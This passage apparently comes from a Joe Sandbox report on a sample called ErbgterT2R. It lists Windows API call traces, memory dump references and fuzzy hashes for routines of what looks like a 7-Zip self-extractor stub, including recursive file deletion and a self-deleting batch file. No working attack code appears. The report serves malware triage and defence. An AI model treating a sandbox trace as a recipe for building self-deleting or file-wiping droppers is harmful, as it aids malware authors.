• lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
• ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
• LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
• String ID:
• API String ID: 829399097-0
• Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
• Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
• Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
• Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4

APIs
• FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
• lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
• lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
• SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
• DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
• FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
• FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
• RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 1862581289-0
• Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
• Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
• Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
• Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C

APIs
• LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
• GetWindow.USER32(?,00000005), ref: 00406D8F
• GetWindow.USER32(00000000,00000002), ref: 00406DA5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
Similarity
• API ID: Window$AddressLibraryLoadProc
• String ID: SetWindowTheme$\EA$uxtheme
• API String ID: 324724604-1613512829
• Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
• Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
• Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
• Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                            • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                                            • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                            • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                            • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                                            • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                            • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                            • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                                            • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                            • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                            • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                                            • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                            • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                                            • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                                            • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                                            • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                            • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                            • API String ID: 3007203151-3467708659
                                                                                            • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                            • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                                            • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                            • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                                            APIs
                                                                                            • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                              • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                              • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                              • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                              • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                              • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                            • _wtol.MSVCRT ref: 004047DC
                                                                                            • _wtol.MSVCRT ref: 004047F8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                            • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                                            • API String ID: 2725485552-3187639848
                                                                                            • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                            • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                                            • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                            • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                                            APIs
                                                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                                            • GetParent.USER32(?), ref: 00402E2E
                                                                                            • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                                            • GetMenu.USER32(?), ref: 00402E55
                                                                                            • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                                            • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                                            • DestroyWindow.USER32(?), ref: 00402EA3
                                                                                            • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                                            • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                                            • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                            • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                            • API String ID: 1731037045-2281146334
                                                                                            • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                            • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                                            • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                            • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                                            APIs
                                                                                            • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                            • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                            • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                            • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                            • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                            • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                                            • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3462224810-0
                                                                                            • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                            • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                                            • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                            • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                                            APIs
                                                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                                            • GetMenu.USER32(?), ref: 00401E44
                                                                                              • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                              • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                              • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                              • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                              • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                              • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                                            • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                                              • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                              • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                              • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                              • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                              • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                              • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                              • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                              • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                              • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                              • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                              • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                              • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                              • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                              • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                                            • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                                            • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                            • String ID: IMAGES$STATIC
                                                                                            • API String ID: 4202116410-1168396491
